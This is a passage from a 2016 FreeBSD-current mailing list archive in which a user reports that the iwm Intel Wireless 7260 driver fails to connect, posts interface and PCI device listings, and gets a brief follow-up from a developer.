Larry Rosenman wrote: > I'm running today's top of tree, and it doesn't seem to want to > connect: > > > re0: flags=8843 metric 0 mtu > 1500 > options=8209b > ether 20:47:47:73:07:5f > inet6 fe80::2247:47ff:fe73:75f%re0 prefixlen 64 scopeid 0x1 > inet6 2001:470:1f0f:42c:2247:47ff:fe73:75f prefixlen 64 autoconf > inet 192.168.200.246 netmask 0xfffffc00 broadcast 192.168.203.255 > nd6 options=23 > media: Ethernet autoselect (1000baseT ) > status: active > lo0: flags=8049 metric 0 mtu 16384 > options=600003 > inet6 ::1 prefixlen 128 > inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2 > inet 127.0.0.1 netmask 0xff000000 > nd6 options=21 > groups: lo > wlan0: flags=8c43 > metric 0 mtu 1500 > ether 58:91:cf:1a:45:69 > inet6 fe80::5a91:cfff:fe1a:4569%wlan0 prefixlen 64 scopeid 0x3 > nd6 options=23 > media: IEEE 802.11 Wireless Ethernet autoselect (autoselect) > status: no carrier > ssid "" channel 8 (2447 MHz 11g) > regdomain FCC country US authmode WPA1+WPA2/802.11i privacy ON > deftxkey UNDEF txpower 30 bmiss 10 scanvalid 60 protmode CTS wme > roaming MANUAL > groups: wlan > > > hostb0@pci0:0:0:0: class=0x060000 card=0x07061028 chip=0x19108086 > rev=0x07 hdr=0x00 > vendor = 'Intel Corporation' > device = 'Skylake Host Bridge/DRAM Registers' > class = bridge > subclass = HOST-PCI > pcib1@pci0:0:1:0: class=0x060400 card=0x20158086 chip=0x19018086 > rev=0x07 hdr=0x01 > vendor = 'Intel Corporation' > device = 'Skylake PCIe Controller (x16)' > class = bridge > subclass = PCI-PCI > pcib2@pci0:0:1:1: class=0x060400 card=0x07061028 chip=0x19058086 > rev=0x07 hdr=0x01 > vendor = 'Intel Corporation' > device = 'Skylake PCIe Controller (x8)' > class = bridge > subclass = PCI-PCI > vgapci1@pci0:0:2:0: class=0x030000 card=0x07061028 chip=0x191b8086 > rev=0x06 hdr=0x00 > vendor = 'Intel Corporation' > device = 'HD Graphics 530' > class = display > subclass = VGA > none0@pci0:0:4:0: class=0x118000 card=0x07061028 chip=0x19038086 > rev=0x07 hdr=0x00 > vendor = 'Intel Corporation' > device = 'Skylake Processor Thermal Subsystem' > class = dasp > xhci0@pci0:0:20:0: class=0x0c0330 card=0x07061028 chip=0xa12f8086 > rev=0x31 hdr=0x00 > vendor = 'Intel Corporation' > device = 'Sunrise Point-H USB 3.0 xHCI Controller' > class = serial bus > subclass = USB > none1@pci0:0:20:2: class=0x118000 card=0x07061028 chip=0xa1318086 > rev=0x31 hdr=0x00 > vendor = 'Intel Corporation' > device = 'Sunrise Point-H Thermal subsystem' > class = dasp > none2@pci0:0:21:0: class=0x118000 card=0x07061028 chip=0xa1608086 > rev=0x31 hdr=0x00 > vendor = 'Intel Corporation' > device = 'Sunrise Point-H Serial IO I2C Controller' > class = dasp > none3@pci0:0:22:0: class=0x078000 card=0x07061028 chip=0xa13a8086 > rev=0x31 hdr=0x00 > vendor = 'Intel Corporation' > device = 'Sunrise Point-H CSME HECI' > class = simple comms > ahci0@pci0:0:23:0: class=0x010601 card=0x07061028 chip=0xa1038086 > rev=0x31 hdr=0x00 > vendor = 'Intel Corporation' > device = 'Sunrise Point-H SATA Controller [AHCI mode]' > class = mass storage > subclass = SATA > pcib3@pci0:0:28:0: class=0x060400 card=0x07061028 chip=0xa1108086 > rev=0xf1 hdr=0x01 > vendor = 'Intel Corporation' > device = 'Sunrise Point-H PCI Express Root Port' > class = bridge > subclass = PCI-PCI > pcib4@pci0:0:28:4: class=0x060400 card=0x07061028 chip=0xa1148086 > rev=0xf1 hdr=0x01 > vendor = 'Intel Corporation' > device = 'Sunrise Point-H PCI Express Root Port' > class = bridge > subclass = PCI-PCI > pcib5@pci0:0:28:5: class=0x060400 card=0x07061028 chip=0xa1158086 > rev=0xf1 hdr=0x01 > vendor = 'Intel Corporation' > device = 'Sunrise Point-H PCI Express Root Port' > class = bridge > subclass = PCI-PCI > pcib6@pci0:0:28:6: class=0x060400 card=0x07061028 chip=0xa1168086 > rev=0xf1 hdr=0x01 > vendor = 'Intel Corporation' > device = 'Sunrise Point-H PCI Express Root Port' > class = bridge > subclass = PCI-PCI > isab0@pci0:0:31:0: class=0x060100 card=0x07061028 chip=0xa14e8086 > rev=0x31 hdr=0x00 > vendor = 'Intel Corporation' > device = 'Sunrise Point-H LPC Controller' > class = bridge > subclass = PCI-ISA > none4@pci0:0:31:2: class=0x058000 card=0x07061028 chip=0xa1218086 > rev=0x31 hdr=0x00 > vendor = 'Intel Corporation' > device = 'Sunrise Point-H PMC' > class = memory > hdac0@pci0:0:31:3: class=0x040300 card=0x07061028 chip=0xa1708086 > rev=0x31 hdr=0x00 > vendor = 'Intel Corporation' > device = 'Sunrise Point-H HD Audio' > class = multimedia > subclass = HDA > none5@pci0:0:31:4: class=0x0c0500 card=0x07061028 chip=0xa1238086 > rev=0x31 hdr=0x00 > vendor = 'Intel Corporation' > device = 'Sunrise Point-H SMBus' > class = serial bus > subclass = SMBus > vgapci0@pci0:2:0:0: class=0x030200 card=0x07061028 chip=0x139b10de > rev=0xa2 hdr=0x00 > vendor = 'NVIDIA Corporation' > device = 'GM107M [GeForce GTX 960M]' > class = display > subclass = 3D > re0@pci0:4:0:0: class=0x020000 card=0x07061028 chip=0x816810ec rev=0x10 > hdr=0x00 > vendor = 'Realtek Semiconductor Co., Ltd.' > device = 'RTL8111/8168/8411 PCI Express Gigabit Ethernet > Controller' > class = network > subclass = ethernet > iwm0@pci0:5:0:0: class=0x028000 card=0xc0708086 chip=0x08b18086 > rev=0x6b hdr=0x00 > vendor = 'Intel Corporation' > device = 'Wireless 7260' > class = network > none6@pci0:6:0:0: class=0xff0000 card=0x522a10ec chip=0x522a10ec > rev=0x01 hdr=0x00 > vendor = 'Realtek Semiconductor Co., Ltd.' > device = 'RTS522A PCI Express Card Reader' > > > What other info do we need? > > > > Path: /usr/src > Working Copy Root Path: /usr/src > URL: https://svn.freebsd.org/base/head > Relative URL: ^/head > Repository Root: https://svn.freebsd.org/base > Repository UUID: ccf9f872-aa2e-dd11-9fc8-001c23d0bc1f > Revision: 303419 > Node Kind: directory > Schedule: normal > Last Changed Author: bdrewery > Last Changed Rev: 303419 > Last Changed Date: 2016-07-27 16:45:11 -0500 (Wed, 27 Jul 2016) > > > FreeBSD pita 12.0-CURRENT FreeBSD 12.0-CURRENT #2 r303419: Wed Jul 27 > 21:22:29 CDT 2016 root@pita:/usr/obj/usr/src/sys/IWM-DEBUG amd64 > 1200001 1200001 -- Larry Rosenman http://www.lerctr.org/~ler Phone: +1 214-642-9640 E-Mail: ler@lerctr.org US Mail: 17716 Limpia Crk, Round Rock, TX 78664-7281 From owner-freebsd-current@freebsd.org Thu Jul 28 23:07:52 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 38BC8BA744A; Thu, 28 Jul 2016 23:07:52 +0000 (UTC) (envelope-from adrian.chadd@gmail.com) Received: from mail-io0-x22d.google.com (mail-io0-x22d.google.com [IPv6:2607:f8b0:4001:c06::22d]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 0D3931C4B; Thu, 28 Jul 2016 23:07:51 +0000 (UTC) (envelope-from adrian.chadd@gmail.com) Received: by mail-io0-x22d.google.com with SMTP id b62so113613403iod.3; Thu, 28 Jul 2016 16:07:51 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:from:date:message-id:subject:to :cc; bh=XebjNUYTFC1rLHJ6QbvElp5NUGCa2W8YMwSjIUFa0DQ=; b=afgR0SQD7HJOw8nBQVpXfE11qtckyBTuux7cWLSWWBp0WBM17GnYkiNs3T246Uw0CZ qdSGdzE7pRxfGn5/OLrkwii0lBazqmvgv0u5prFachi+CaBZHDW6iKMPqqK5gkou3uZM eerptupEH/BmHe7H/xxwUvusrgGNdjWNVgBj/P2bFCDkqEAD5Jcom6r7EruO9343WAnH Y95hLlAwRVbkJMyqI2ynqGvnKMuaSqfeyZQ6FkFiGkNfbXQAv0cTFU6UJ/CkgFXNHaxQ PV40QMAQ7+/+RwDKzRLngGD6s0Ejw0k9yQgCo/R4Z+tkk+DYEZ85z8ylWoun5HDetaGF xksA== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:mime-version:in-reply-to:references:from:date :message-id:subject:to:cc; bh=XebjNUYTFC1rLHJ6QbvElp5NUGCa2W8YMwSjIUFa0DQ=; b=ZDdbhSFbhhn4NhL1LqOvi0cay0TJz/9x3GN5ZPLwTWZ7SfI3/dv9tMUk03uY7CTx38 E/mt6S0j687stE3VOM351lcFS04SvQYHoAy9pZfzHSzR60k5jPnApUPsgnutOQ2wl/7v 6Pk2NfIkutieuYAiLn7py47Ee24RFloYj977Kl9OrLyesAHL7jY3vwRo4wRhDlnCmIxN N5QPcXm2FRmNbC7c7MWRDd5BMi2cX/9ABUpR8SW7gF81sdXEiSPc4q8VtHrjqRGrgeby k6Rl4lbcmybuYHtsTtkh8SnqRbd49Aasn2bQUIeAJxGv3WvY1wnC0fILBGQZUSSmrVBt /bDg== X-Gm-Message-State: AEkoouu9cvyw1yS0g03REAdy8IGJEDFtByf5AynemvPSqZxfV7gDcEup4rGsFWJRrly0mQeNSNykravgvaRAUQ== X-Received: by 10.107.13.70 with SMTP id 67mr40972202ion.75.1469747271181; Thu, 28 Jul 2016 16:07:51 -0700 (PDT) MIME-Version: 1.0 Received: by 10.36.141.129 with HTTP; Thu, 28 Jul 2016 16:07:50 -0700 (PDT) In-Reply-To: <6421da24a2ec668667f83a3255dc247f@thebighonker.lerctr.org> References: <20160728023954.GA1321@pita> <6421da24a2ec668667f83a3255dc247f@thebighonker.lerctr.org> From: Adrian Chadd Date: Thu, 28 Jul 2016 16:07:50 -0700 Message-ID: Subject: Re: IWM(7260), no connect To: Larry Rosenman Cc: "freebsd-wireless@freebsd.org" , freebsd-current Content-Type: text/plain; charset=UTF-8 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 23:07:52 -0000 Hi, Andriy responded? -adrian On 28 July 2016 at 16:04, Larry Rosenman wrote: > Anyone? > > > On 2016-07-27 21:39, Larry Rosenman wrote: >> >> I'm running today's top of tree, and it doesn't seem to want to connect: >> >> >> re0: flags=8843 metric 0 mtu 1500 >> >> options=8209b >> ether 20:47:47:73:07:5f >> inet6 fe80::2247:47ff:fe73:75f%re0 prefixlen 64 scopeid 0x1 >> inet6 2001:470:1f0f:42c:2247:47ff:fe73:75f prefixlen 64 autoconf >> inet 192.168.200.246 netmask 0xfffffc00 broadcast 192.168.203.255 >> nd6 options=23 >> media: Ethernet autoselect (1000baseT ) >> status: active >> lo0: flags=8049 metric 0 mtu 16384 >> options=600003 >> inet6 ::1 prefixlen 128 >> inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2 >> inet 127.0.0.1 netmask 0xff000000 >> nd6 options=21 >> groups: lo >> wlan0: flags=8c43 >> metric 0 mtu 1500 >> ether 58:91:cf:1a:45:69 >> inet6 fe80::5a91:cfff:fe1a:4569%wlan0 prefixlen 64 scopeid 0x3 >> nd6 options=23 >> media: IEEE 802.11 Wireless Ethernet autoselect (autoselect) >> status: no carrier >> ssid "" channel 8 (2447 MHz 11g) >> regdomain FCC country US authmode WPA1+WPA2/802.11i privacy ON >> deftxkey UNDEF txpower 30 bmiss 10 scanvalid 60 protmode CTS wme >> roaming MANUAL >> groups: wlan >> >> >> hostb0@pci0:0:0:0: class=0x060000 card=0x07061028 chip=0x19108086 >> rev=0x07 hdr=0x00 >> vendor = 'Intel Corporation' >> device = 'Skylake Host Bridge/DRAM Registers' >> class = bridge >> subclass = HOST-PCI >> pcib1@pci0:0:1:0: class=0x060400 card=0x20158086 chip=0x19018086 >> rev=0x07 hdr=0x01 >> vendor = 'Intel Corporation' >> device = 'Skylake PCIe Controller (x16)' >> class = bridge >> subclass = PCI-PCI >> pcib2@pci0:0:1:1: class=0x060400 card=0x07061028 chip=0x19058086 >> rev=0x07 hdr=0x01 >> vendor = 'Intel Corporation' >> device = 'Skylake PCIe Controller (x8)' >> class = bridge >> subclass = PCI-PCI >> vgapci1@pci0:0:2:0: class=0x030000 card=0x07061028 chip=0x191b8086 >> rev=0x06 hdr=0x00 >> vendor = 'Intel Corporation' >> device = 'HD Graphics 530' >> class = display >> subclass = VGA >> none0@pci0:0:4:0: class=0x118000 card=0x07061028 chip=0x19038086 >> rev=0x07 hdr=0x00 >> vendor = 'Intel Corporation' >> device = 'Skylake Processor Thermal Subsystem' >> class = dasp >> xhci0@pci0:0:20:0: class=0x0c0330 card=0x07061028 chip=0xa12f8086 >> rev=0x31 hdr=0x00 >> vendor = 'Intel Corporation' >> device = 'Sunrise Point-H USB 3.0 xHCI Controller' >> class = serial bus >> subclass = USB >> none1@pci0:0:20:2: class=0x118000 card=0x07061028 chip=0xa1318086 >> rev=0x31 hdr=0x00 >> vendor = 'Intel Corporation' >> device = 'Sunrise Point-H Thermal subsystem' >> class = dasp >> none2@pci0:0:21:0: class=0x118000 card=0x07061028 chip=0xa1608086 >> rev=0x31 hdr=0x00 >> vendor = 'Intel Corporation' >> device = 'Sunrise Point-H Serial IO I2C Controller' >> class = dasp >> none3@pci0:0:22:0: class=0x078000 card=0x07061028 chip=0xa13a8086 >> rev=0x31 hdr=0x00 >> vendor = 'Intel Corporation' >> device = 'Sunrise Point-H CSME HECI' >> class = simple comms >> ahci0@pci0:0:23:0: class=0x010601 card=0x07061028 chip=0xa1038086 >> rev=0x31 hdr=0x00 >> vendor = 'Intel Corporation' >> device = 'Sunrise Point-H SATA Controller [AHCI mode]' >> class = mass storage >> subclass = SATA >> pcib3@pci0:0:28:0: class=0x060400 card=0x07061028 chip=0xa1108086 >> rev=0xf1 hdr=0x01 >> vendor = 'Intel Corporation' >> device = 'Sunrise Point-H PCI Express Root Port' >> class = bridge >> subclass = PCI-PCI >> pcib4@pci0:0:28:4: class=0x060400 card=0x07061028 chip=0xa1148086 >> rev=0xf1 hdr=0x01 >> vendor = 'Intel Corporation' >> device = 'Sunrise Point-H PCI Express Root Port' >> class = bridge >> subclass = PCI-PCI >> pcib5@pci0:0:28:5: class=0x060400 card=0x07061028 chip=0xa1158086 >> rev=0xf1 hdr=0x01 >> vendor = 'Intel Corporation' >> device = 'Sunrise Point-H PCI Express Root Port' >> class = bridge >> subclass = PCI-PCI >> pcib6@pci0:0:28:6: class=0x060400 card=0x07061028 chip=0xa1168086 >> rev=0xf1 hdr=0x01 >> vendor = 'Intel Corporation' >> device = 'Sunrise Point-H PCI Express Root Port' >> class = bridge >> subclass = PCI-PCI >> isab0@pci0:0:31:0: class=0x060100 card=0x07061028 chip=0xa14e8086 >> rev=0x31 hdr=0x00 >> vendor = 'Intel Corporation' >> device = 'Sunrise Point-H LPC Controller' >> class = bridge >> subclass = PCI-ISA >> none4@pci0:0:31:2: class=0x058000 card=0x07061028 chip=0xa1218086 >> rev=0x31 hdr=0x00 >> vendor = 'Intel Corporation' >> device = 'Sunrise Point-H PMC' >> class = memory >> hdac0@pci0:0:31:3: class=0x040300 card=0x07061028 chip=0xa1708086 >> rev=0x31 hdr=0x00 >> vendor = 'Intel Corporation' >> device = 'Sunrise Point-H HD Audio' >> class = multimedia >> subclass = HDA >> none5@pci0:0:31:4: class=0x0c0500 card=0x07061028 chip=0xa1238086 >> rev=0x31 hdr=0x00 >> vendor = 'Intel Corporation' >> device = 'Sunrise Point-H SMBus' >> class = serial bus >> subclass = SMBus >> vgapci0@pci0:2:0:0: class=0x030200 card=0x07061028 chip=0x139b10de >> rev=0xa2 hdr=0x00 >> vendor = 'NVIDIA Corporation' >> device = 'GM107M [GeForce GTX 960M]' >> class = display >> subclass = 3D >> re0@pci0:4:0:0: class=0x020000 card=0x07061028 chip=0x816810ec rev=0x10 >> hdr=0x00 >> vendor = 'Realtek Semiconductor Co., Ltd.' >> device = 'RTL8111/8168/8411 PCI Express Gigabit Ethernet >> Controller' >> class = network >> subclass = ethernet >> iwm0@pci0:5:0:0: class=0x028000 card=0xc0708086 chip=0x08b18086 >> rev=0x6b hdr=0x00 >> vendor = 'Intel Corporation' >> device = 'Wireless 7260' >> class = network >> none6@pci0:6:0:0: class=0xff0000 card=0x522a10ec chip=0x522a10ec >> rev=0x01 hdr=0x00 >> vendor = 'Realtek Semiconductor Co., Ltd.' >> device = 'RTS522A PCI Express Card Reader' >> >> >> What other info do we need? >> >> >> >> Path: /usr/src >> Working Copy Root Path: /usr/src >> URL: https://svn.freebsd.org/base/head >> Relative URL: ^/head >> Repository Root: https://svn.freebsd.org/base >> Repository UUID: ccf9f872-aa2e-dd11-9fc8-001c23d0bc1f >> Revision: 303419 >> Node Kind: directory >> Schedule: normal >> Last Changed Author: bdrewery >> Last Changed Rev: 303419 >> Last Changed Date: 2016-07-27 16:45:11 -0500 (Wed, 27 Jul 2016) >> >> >> FreeBSD pita 12.0-CURRENT FreeBSD 12.0-CURRENT #2 r303419: Wed Jul 27 >> 21:22:29 CDT 2016 root@pita:/usr/obj/usr/src/sys/IWM-DEBUG amd64 >> 1200001 1200001 > > > -- > Larry Rosenman http://www.lerctr.org/~ler > Phone: +1 214-642-9640 E-Mail: ler@lerctr.org > US Mail: 17716 Limpia Crk, Round Rock, TX 78664-7281 From owner-freebsd-current@freebsd.org Thu Jul 28 23:10:27 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 141E7BA752C; Thu, 28 Jul 2016 23:10:27 +0000 (UTC) (envelope-from ler@lerctr.org) Received: from thebighonker.lerctr.org (thebighonker.lerctr.org [IPv6:2001:470:1f0f:3ad:223:7dff:fe9e:6e8a]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client CN "thebighonker.lerctr.org", Issuer "COMODO RSA Domain Validation Secure Server CA" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id E66631DB8; Thu, 28 Jul 2016 23:10:26 +0000 (UTC) (envelope-from ler@lerctr.org) DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=lerctr.org; s=lerami; h=Message-ID:References:In-Reply-To:Subject:Cc:To:From:Date: Content-Transfer-Encoding:Content-Type:MIME-Version:Sender:Reply-To: Content-ID:Content-Description:Resent-Date:Resent-From:Resent-Sender: Resent-To:Resent-Cc:Resent-Message-ID:List-Id:List-Help:List-Unsubscribe: List-Subscribe:List-Post:List-Owner:List-Archive; bh=dAn8Fx8nGOgOpW4GDg+tnCVJR3u+zRCD9HCS+kcf3MY=; b=m6dHeq76X6SGOQghA35pHFFkQN Z24jNGfYgaXiRDTSVL4nGczBWCidSZ+wGNZGQneofPw2dFwhCJBf9WgzZwh81YNRoSpSR+oH74OwW bRZmGrjOAmbEj4+WR8hxPTA7MFwWtNngAZxW0A6e+eFssX4uyysCNtzqU6HTzDV4dYms=; Received: from thebighonker.lerctr.org ([2001:470:1f0f:3ad:223:7dff:fe9e:6e8a]:44848 helo=webmail.lerctr.org) by thebighonker.lerctr.org with esmtpsa (TLSv1.2:ECDHE-RSA-AES128-GCM-SHA256:128) (Exim 4.87 (FreeBSD)) (envelope-from ) id 1bSuRe-000FoL-B4; Thu, 28 Jul 2016 18:10:26 -0500 Received: from 2001:470:1f0f:42c:b9cb:216a:6647:9bf0 by webmail.lerctr.org with HTTP (HTTP/1.1 POST); Thu, 28 Jul 2016 18:10:26 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII; format=flowed Content-Transfer-Encoding: 7bit Date: Thu, 28 Jul 2016 18:10:26 -0500 From: Larry Rosenman To: Adrian Chadd Cc: freebsd-wireless@freebsd.org, freebsd-current Subject: Re: IWM(7260), no connect In-Reply-To: References: <20160728023954.GA1321@pita> <6421da24a2ec668667f83a3255dc247f@thebighonker.lerctr.org> Message-ID: X-Sender: ler@lerctr.org User-Agent: Roundcube Webmail/1.2.0 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 23:10:27 -0000 negative. no reponse (except for this one) at all. :( On 2016-07-28 18:07, Adrian Chadd wrote: > Hi, > > Andriy responded? > > > -adrian > > > On 28 July 2016 at 16:04, Larry Rosenman wrote: >> Anyone? >> >> >> On 2016-07-27 21:39, Larry Rosenman wrote: >>> >>> I'm running today's top of tree, and it doesn't seem to want to >>> connect: >>> >>> >>> re0: flags=8843 metric 0 mtu >>> 1500 >>> >>> options=8209b >>> ether 20:47:47:73:07:5f >>> inet6 fe80::2247:47ff:fe73:75f%re0 prefixlen 64 scopeid 0x1 >>> inet6 2001:470:1f0f:42c:2247:47ff:fe73:75f prefixlen 64 >>> autoconf >>> inet 192.168.200.246 netmask 0xfffffc00 broadcast >>> 192.168.203.255 >>> nd6 options=23 >>> media: Ethernet autoselect (1000baseT ) >>> status: active >>> lo0: flags=8049 metric 0 mtu 16384 >>> options=600003 >>> inet6 ::1 prefixlen 128 >>> inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2 >>> inet 127.0.0.1 netmask 0xff000000 >>> nd6 options=21 >>> groups: lo >>> wlan0: flags=8c43 >>> metric 0 mtu 1500 >>> ether 58:91:cf:1a:45:69 >>> inet6 fe80::5a91:cfff:fe1a:4569%wlan0 prefixlen 64 scopeid >>> 0x3 >>> nd6 options=23 >>> media: IEEE 802.11 Wireless Ethernet autoselect (autoselect) >>> status: no carrier >>> ssid "" channel 8 (2447 MHz 11g) >>> regdomain FCC country US authmode WPA1+WPA2/802.11i privacy >>> ON >>> deftxkey UNDEF txpower 30 bmiss 10 scanvalid 60 protmode CTS >>> wme >>> roaming MANUAL >>> groups: wlan >>> >>> >>> hostb0@pci0:0:0:0: class=0x060000 card=0x07061028 >>> chip=0x19108086 >>> rev=0x07 hdr=0x00 >>> vendor = 'Intel Corporation' >>> device = 'Skylake Host Bridge/DRAM Registers' >>> class = bridge >>> subclass = HOST-PCI >>> pcib1@pci0:0:1:0: class=0x060400 card=0x20158086 >>> chip=0x19018086 >>> rev=0x07 hdr=0x01 >>> vendor = 'Intel Corporation' >>> device = 'Skylake PCIe Controller (x16)' >>> class = bridge >>> subclass = PCI-PCI >>> pcib2@pci0:0:1:1: class=0x060400 card=0x07061028 >>> chip=0x19058086 >>> rev=0x07 hdr=0x01 >>> vendor = 'Intel Corporation' >>> device = 'Skylake PCIe Controller (x8)' >>> class = bridge >>> subclass = PCI-PCI >>> vgapci1@pci0:0:2:0: class=0x030000 card=0x07061028 >>> chip=0x191b8086 >>> rev=0x06 hdr=0x00 >>> vendor = 'Intel Corporation' >>> device = 'HD Graphics 530' >>> class = display >>> subclass = VGA >>> none0@pci0:0:4:0: class=0x118000 card=0x07061028 >>> chip=0x19038086 >>> rev=0x07 hdr=0x00 >>> vendor = 'Intel Corporation' >>> device = 'Skylake Processor Thermal Subsystem' >>> class = dasp >>> xhci0@pci0:0:20:0: class=0x0c0330 card=0x07061028 >>> chip=0xa12f8086 >>> rev=0x31 hdr=0x00 >>> vendor = 'Intel Corporation' >>> device = 'Sunrise Point-H USB 3.0 xHCI Controller' >>> class = serial bus >>> subclass = USB >>> none1@pci0:0:20:2: class=0x118000 card=0x07061028 >>> chip=0xa1318086 >>> rev=0x31 hdr=0x00 >>> vendor = 'Intel Corporation' >>> device = 'Sunrise Point-H Thermal subsystem' >>> class = dasp >>> none2@pci0:0:21:0: class=0x118000 card=0x07061028 >>> chip=0xa1608086 >>> rev=0x31 hdr=0x00 >>> vendor = 'Intel Corporation' >>> device = 'Sunrise Point-H Serial IO I2C Controller' >>> class = dasp >>> none3@pci0:0:22:0: class=0x078000 card=0x07061028 >>> chip=0xa13a8086 >>> rev=0x31 hdr=0x00 >>> vendor = 'Intel Corporation' >>> device = 'Sunrise Point-H CSME HECI' >>> class = simple comms >>> ahci0@pci0:0:23:0: class=0x010601 card=0x07061028 >>> chip=0xa1038086 >>> rev=0x31 hdr=0x00 >>> vendor = 'Intel Corporation' >>> device = 'Sunrise Point-H SATA Controller [AHCI mode]' >>> class = mass storage >>> subclass = SATA >>> pcib3@pci0:0:28:0: class=0x060400 card=0x07061028 >>> chip=0xa1108086 >>> rev=0xf1 hdr=0x01 >>> vendor = 'Intel Corporation' >>> device = 'Sunrise Point-H PCI Express Root Port' >>> class = bridge >>> subclass = PCI-PCI >>> pcib4@pci0:0:28:4: class=0x060400 card=0x07061028 >>> chip=0xa1148086 >>> rev=0xf1 hdr=0x01 >>> vendor = 'Intel Corporation' >>> device = 'Sunrise Point-H PCI Express Root Port' >>> class = bridge >>> subclass = PCI-PCI >>> pcib5@pci0:0:28:5: class=0x060400 card=0x07061028 >>> chip=0xa1158086 >>> rev=0xf1 hdr=0x01 >>> vendor = 'Intel Corporation' >>> device = 'Sunrise Point-H PCI Express Root Port' >>> class = bridge >>> subclass = PCI-PCI >>> pcib6@pci0:0:28:6: class=0x060400 card=0x07061028 >>> chip=0xa1168086 >>> rev=0xf1 hdr=0x01 >>> vendor = 'Intel Corporation' >>> device = 'Sunrise Point-H PCI Express Root Port' >>> class = bridge >>> subclass = PCI-PCI >>> isab0@pci0:0:31:0: class=0x060100 card=0x07061028 >>> chip=0xa14e8086 >>> rev=0x31 hdr=0x00 >>> vendor = 'Intel Corporation' >>> device = 'Sunrise Point-H LPC Controller' >>> class = bridge >>> subclass = PCI-ISA >>> none4@pci0:0:31:2: class=0x058000 card=0x07061028 >>> chip=0xa1218086 >>> rev=0x31 hdr=0x00 >>> vendor = 'Intel Corporation' >>> device = 'Sunrise Point-H PMC' >>> class = memory >>> hdac0@pci0:0:31:3: class=0x040300 card=0x07061028 >>> chip=0xa1708086 >>> rev=0x31 hdr=0x00 >>> vendor = 'Intel Corporation' >>> device = 'Sunrise Point-H HD Audio' >>> class = multimedia >>> subclass = HDA >>> none5@pci0:0:31:4: class=0x0c0500 card=0x07061028 >>> chip=0xa1238086 >>> rev=0x31 hdr=0x00 >>> vendor = 'Intel Corporation' >>> device = 'Sunrise Point-H SMBus' >>> class = serial bus >>> subclass = SMBus >>> vgapci0@pci0:2:0:0: class=0x030200 card=0x07061028 >>> chip=0x139b10de >>> rev=0xa2 hdr=0x00 >>> vendor = 'NVIDIA Corporation' >>> device = 'GM107M [GeForce GTX 960M]' >>> class = display >>> subclass = 3D >>> re0@pci0:4:0:0: class=0x020000 card=0x07061028 chip=0x816810ec >>> rev=0x10 >>> hdr=0x00 >>> vendor = 'Realtek Semiconductor Co., Ltd.' >>> device = 'RTL8111/8168/8411 PCI Express Gigabit Ethernet >>> Controller' >>> class = network >>> subclass = ethernet >>> iwm0@pci0:5:0:0: class=0x028000 card=0xc0708086 >>> chip=0x08b18086 >>> rev=0x6b hdr=0x00 >>> vendor = 'Intel Corporation' >>> device = 'Wireless 7260' >>> class = network >>> none6@pci0:6:0:0: class=0xff0000 card=0x522a10ec >>> chip=0x522a10ec >>> rev=0x01 hdr=0x00 >>> vendor = 'Realtek Semiconductor Co., Ltd.' >>> device = 'RTS522A PCI Express Card Reader' >>> >>> >>> What other info do we need? >>> >>> >>> >>> Path: /usr/src >>> Working Copy Root Path: /usr/src >>> URL: https://svn.freebsd.org/base/head >>> Relative URL: ^/head >>> Repository Root: https://svn.freebsd.org/base >>> Repository UUID: ccf9f872-aa2e-dd11-9fc8-001c23d0bc1f >>> Revision: 303419 >>> Node Kind: directory >>> Schedule: normal >>> Last Changed Author: bdrewery >>> Last Changed Rev: 303419 >>> Last Changed Date: 2016-07-27 16:45:11 -0500 (Wed, 27 Jul 2016) >>> >>> >>> FreeBSD pita 12.0-CURRENT FreeBSD 12.0-CURRENT #2 r303419: Wed Jul 27 >>> 21:22:29 CDT 2016 root@pita:/usr/obj/usr/src/sys/IWM-DEBUG amd64 >>> 1200001 1200001 >> >> >> -- >> Larry Rosenman http://www.lerctr.org/~ler >> Phone: +1 214-642-9640 E-Mail: ler@lerctr.org >> US Mail: 17716 Limpia Crk, Round Rock, TX 78664-7281 -- Larry Rosenman http://www.lerctr.org/~ler Phone: +1 214-642-9640 E-Mail: ler@lerctr.org US Mail: 17716 Limpia Crk, Round Rock, TX 78664-7281 From owner-freebsd-current@freebsd.org Thu Jul 28 23:15:39 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 4BDBABA76FF; Thu, 28 Jul 2016 23:15:39 +0000 (UTC) (envelope-from baptiste.daroussin@gmail.com) Received: from mail-wm0-x230.google.com (mail-wm0-x230.google.com [IPv6:2a00:1450:400c:c09::230]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org 